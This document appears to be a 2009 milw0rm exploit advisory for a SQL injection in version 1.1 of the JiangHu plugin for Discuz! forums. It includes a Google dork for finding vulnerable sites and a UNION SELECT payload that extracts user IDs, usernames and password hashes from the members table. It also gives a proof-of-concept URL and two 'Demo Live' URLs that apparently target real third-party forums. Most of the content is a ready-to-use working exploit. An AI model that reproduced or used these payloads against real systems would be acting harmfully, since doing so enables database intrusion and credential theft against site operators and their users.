=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================
========================[Author]=========================
[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : Feb, 9th 2009
[+] Update : Sep, 1th 2009
========================[Soft Info]======================
Software: Discuz! Plugin JiangHu Inn
Version : 1.1
Vendor : http://www.discuz.com
d0rk : inurl:forummission.php
[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
/---------------------------------------------www.zhaohuan.net-------------------------------------------------\
Greetz : Snda Security Team
& Normal is boring - -!
\--------------------------------------------------------------------------------------------------------------/
# milw0rm.com [2009-09-02]